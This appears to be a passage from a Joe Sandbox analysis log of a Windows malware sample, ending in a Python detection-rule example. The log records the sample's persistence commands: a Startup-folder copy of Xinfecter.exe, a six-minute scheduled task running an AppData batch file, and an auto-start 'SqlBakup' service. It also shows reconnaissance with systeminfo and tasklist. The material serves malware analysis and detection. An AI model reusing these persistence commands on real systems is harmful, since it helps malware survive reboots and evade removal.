      Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: vbscript.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: edputil.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: slc.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: sppc.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: mpr.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: version.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
      Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exe | Section loaded: fsutilext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
      Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
      Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll
      Source: C:\Windows\System32\find.exe | Section loaded: fsutilext.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: netapi32.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: wininet.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: samcli.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: dsrole.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: netutils.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Section loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dll
      Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dll
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csv
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: BiXS3FRoLe.exeStatic file information: File size 1257984 > 1048576
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: BiXS3FRoLe.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: BiXS3FRoLe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: BiXS3FRoLe.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B100BB LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B100BB
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01557 push ecx; ret 0_2_00B0156A
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exeCode function: 0_2_00B01BB6 push ecx; ret 0_2_00B01BC9
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1557 push ecx; ret 48_2_000A156A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 48_2_000A1BB6 push ecx; ret 48_2_000A1BC9

      Persistence and Installation Behavior

      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Windows\SysMain.sys
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\N-Save.sys
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe

      Boot Survival

      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATA
      Source: C:\Users\user\Desktop\BiXS3FRoLe.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATA
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
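      The three Boot Survival mechanisms listed above (the Startup-folder copy of Xinfecter.exe, the 6-minute "Microsoft_Auto_Scheduler" task pointing at a .bat under AppData, and the "SqlBakup" service whose binPath is the Startup-folder binary), together with the cmd.exe watchdog loop under Malware Analysis System Evasion (tasklist /fi "ImageName eq BiXS3FRoLe.exe" followed by timeout /t 15 /nobreak, repeated), are the process-creation events a detection engineer would key on. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it runs four simple rules over constructed (parent, command line) events modelled on the command lines in this report. The rule names, the 10-minute interval threshold, the "two tasklist plus two timeout calls" watchdog threshold and the two benign look-alike events are assumptions chosen for illustration; the sc rule does not depend on the "start=auto" / "start= auto" spacing, so it matches all three sc create variants seen in the report.

```python
"""Process-creation rules for the persistence and watchdog behaviour in this report.

Added example (not Joe Sandbox or sample code). Rule names, thresholds and the
benign look-alike events below are assumptions chosen for illustration.
"""
import re
from collections import Counter, defaultdict

# Constructed sample events (parent image, child command line), modelled on the
# "Process created" entries in this report plus two benign look-alikes (7 and 8).
SAMPLE_EVENTS = [
    ("cmd.exe", r'''schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f'''),
    ("cmd.exe", r'sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto'),
    ("cmd.exe", r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"'),
    ("cmd.exe", r'tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv'),
    ("cmd.exe", r'timeout /t 15 /nobreak'),
    ("cmd.exe", r'tasklist /fi "ImageName eq BiXS3FRoLe.exe" /fo csv'),
    ("cmd.exe", r'timeout /t 15 /nobreak'),
    ("explorer.exe", r'schtasks /create /sc daily /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"'),
    ("services.exe", r'sc create VendorSvc binPath= "C:\Program Files\Vendor\svc.exe" start= auto'),
]

USER_WRITABLE = re.compile(r"\\(?:Users|Documents and Settings)\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
SCRIPT_EXT = re.compile(r"\.(?:bat|cmd|vbs|vbe|js|jse|wsf|ps1|hta)\b", re.I)
MAX_BENIGN_MINUTES = 10  # assumption: a /sc minute task firing this often is a beacon, not maintenance


def _arg_after(flag, cmdline):
    """Value following a schtasks-style flag, with surrounding double and single quotes removed."""
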